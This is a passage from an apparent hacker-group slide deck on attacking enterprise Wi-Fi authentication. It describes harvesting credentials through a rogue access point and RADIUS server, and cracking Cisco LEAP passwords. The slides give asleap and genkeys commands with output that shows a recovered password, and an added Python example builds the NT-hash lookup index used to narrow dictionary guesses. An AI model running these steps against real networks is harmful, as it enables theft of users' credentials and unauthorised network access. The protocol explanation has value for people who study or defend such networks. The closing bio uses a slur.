That lets the attacker stand up a rogue AP with the same SSID, impersonate the RADIUS server and harvest login credentials from victims. With PEAP or EAP-TTLS the inner authentication is usually MS-CHAPv2, so what is harvested is the challenge/response pair, which is cracked offline afterwards (see the asleap -C/-R options later in this deck). EAP-TLS, where the client must present its own certificate, gives the rogue server no password to harvest.
We can use FreeRADIUS as the fake RADIUS server together with the WPE (Wireless Pwnage Edition) patch, which logs the inner-authentication credentials on the FreeRADIUS server.
Additional information: http://www.willhackforsushi.com/FreeRADIUS_WPE.html
• 37. Exploiting CISCO LEAP
Cisco's proprietary Lightweight Extensible Authentication Protocol (LEAP) was meant to eliminate WEP's weaknesses by supporting centralized, user-based authentication and generating dynamic WEP keys. Cisco LEAP is one of the EAP types carried by 802.1X.
Looking at the exchange in Wireshark, we found that the username is sent to the RADIUS server in plaintext, while the password never appears at all: LEAP authenticates with an MS-CHAPv1-style exchange, an 8-byte challenge answered by a 24-byte response computed from the NT hash of the password with three DES operations. The third DES key is built from only the last two bytes of the NT hash padded with five zero bytes, which is what makes the offline dictionary attack on the following slides so fast.
So it's also vulnerable to exploit... (insert evil
• 38. Exploiting CISCO LEAP
asleap is a tool designed to recover weak LEAP (Cisco's Lightweight Extensible Authentication Protocol) and PPTP passwords.
asleap can perform:
- Weak LEAP and PPTP password recovery from pcap and AiroPeek files or from live capture
- Deauthentication of clients on a LEAP WLAN (speeding up LEAP password recovery)
AIRJACK DRIVER REQUIRED (for the live-capture and deauthentication features; the passive attack on a capture file used below needs no special driver)
Download here: http://asleap.sourceforge.net/
• 39. Exploiting CISCO LEAP
First step: use genkeys (shipped with asleap) to produce the necessary database (.dat) and index (.idx) files:

#./genkeys -r dictionary -f dict.dat -n dict.idx

dictionary = our wordlist/dictionary file, one word per line
dict.dat = the new output password+hash file (generated by this command)
dict.idx = the new output index file (generated by this command)
genkeys computes the NT hash (MD4 of the UTF-16LE password) of every word and indexes the hashes by their last two bytes, so that asleap can later jump straight to the candidates matching the two hash bytes it recovers from a capture.
-----------------------------------------------------------------------
genkeys 1.4 - generates lookup file for asleap. <jwright@hasborg.com>
Generating hashes for passwords (this may take some time) ...Done.
3 hashes written in 0.2 seconds: 122.67 hashes/second
Starting sort (be patient) ...Done.
Completed sort in 0 compares.
Creating index file (almost finished) ...Done.
-----------------------------------------------------------------------
• 40. Exploiting CISCO LEAP
The final step in recovering our weak LEAP password is to run asleap with the newly created .dat and .idx files:

#./asleap -r data/leap.dump -f dict.dat -n dict.idx

leap.dump = our libpcap packet capture file (NOTE: any libpcap capture (e.g. from tcpdump or Wireshark) or AiroPeek capture file (.apc) can be used)
dict.dat = the password+hash file generated with genkeys (see above)
dict.idx = the index file generated with genkeys (see above)
• 41. Exploiting CISCO LEAP
So... what are we waiting for?

#./asleap -r data/leap.dump -f dict.dat -n dict.idx
-----------------------------------------------------------------------
asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using the passive attack method.
Captured LEAP exchange information:
        username:          qa_leap
        challenge:         0786aea0215bc30a
        response:          7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6
        hash bytes:        4a39
        NT hash:           a1fc198bdbf5833a56fb40cdd1a64a39
        password:          qaleap
Closing pcap ...
-----------------------------------------------------------------------
"hash bytes" are the last two bytes of the NT hash, brute-forced from the last 8 bytes of the response (at most 2^16 DES trials, since the third DES key holds only those two bytes and five zero bytes). Only dictionary words whose NT hash ends in 4a39 are then checked against the full 24-byte response, which is why a dictionary run takes seconds.
asleap 2.2 adds the -C and -R options to specify the challenge and the response (respectively) as colon-delimited hex bytes. With these options asleap becomes a generic MS-CHAPv2 cracking tool, and can be applied anytime you have an MS-CHAPv2 challenge/response pair available, for example one logged by FreeRADIUS-WPE.
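The genkeys/asleap lookup from the last three slides, as an added Python example (not from the slides and not asleap's code). It implements the NT hash (MD4 over the UTF-16LE password) that LEAP, PPTP and the MS-CHAPv2 inner authentication of PEAP/TTLS all derive their DES keys from, builds the genkeys-style index keyed by the last two hash bytes, and returns the candidates asleap would then test against the full response. The 2^16-trial DES step that recovers the "hash bytes" from a response is described but not implemented here (the standard library has no DES), so the recovered bytes are given as input; "qaleap" and the hash bytes 4a39 come from the slides' asleap run, and the rest of the wordlist is constructed.

```python
# Added example (not from the slides): NT hashes and the genkeys/asleap lookup.
import struct
from collections import defaultdict


def md4(msg: bytes) -> bytes:
    """MD4 (RFC 1320); the NT hash that LEAP and MS-CHAP derive their DES keys from."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    rounds = ((F, 0, range(16), (3, 7, 11, 19)),
              (G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
              (H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)))
    bitlen = len(msg) * 8
    msg += b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + bitlen.to_bytes(8, "little")
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, k, order, shifts in rounds:
            for j, i in enumerate(order):
                a, b, c, d = d, rol((a + fn(b, c, d) + X[i] + k) & 0xFFFFFFFF, shifts[j % 4]), b, c
        h = [(x + y) & 0xFFFFFFFF for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def genkeys(wordlist):
    """genkeys equivalent: hash every word and index the hashes by their last two bytes.
    LEAP/MS-CHAP build the third DES key from NT-hash bytes 14-15 padded with five zero
    bytes, so those two bytes can be brute-forced (at most 2^16 DES trials) from any
    challenge/response pair; asleap prints them as "hash bytes"."""
    index = defaultdict(list)
    for word in wordlist:
        index[nt_hash(word)[14:16]].append(word)
    return index


def asleap_candidates(index, hash_bytes: bytes):
    """Words whose NT hash ends in the recovered bytes: the only ones worth a full
    DES check of the 24-byte response (that DES step is not implemented here)."""
    return index.get(hash_bytes, [])


if __name__ == "__main__":
    # Constructed wordlist; "qaleap" and hash bytes 4a39 are from the slides' asleap run.
    index = genkeys(["password", "letmein", "qaleap", "cisco123"])
    print(asleap_candidates(index, bytes.fromhex("4a39")))
```

With a real dictionary the index cuts the work from "one full response computation per word" to "one per word that happens to share the two recovered bytes", on average 1/65536 of the list, which is the whole reason asleap finishes in seconds. The same lookup applies unchanged to the MS-CHAPv2 challenge/response pairs that FreeRADIUS-WPE logs, since MS-CHAPv2 uses the same three DES keys cut from the NT hash.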
• 42. References & Greetz to
References:
- PaulDotCom Forum
- http://www.darkoperator.com/scripts
- http://trac.metasploit.com/wiki/Karmetasploit
- http://aircrack-ng.org/doku.php
- http://www.citec.us
- http://www.milw0rm.com
Greetz to the CWH Underground team:
Greetz: ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK
Special Thx: asylu3, str0ke, citec.us, milw0rm.com
• 43. About Me / Questions
I'm Siddiq, 19.
Currently pursuing a degree in Biochemistry at Technology Park Malaysia College.
A retarded lazy part-time web programmer @ I-don't-know-anything-about-IT
Currently looking for a real part-time job.
mysiddiq@gmail.com
Thanks for attending.
Questions?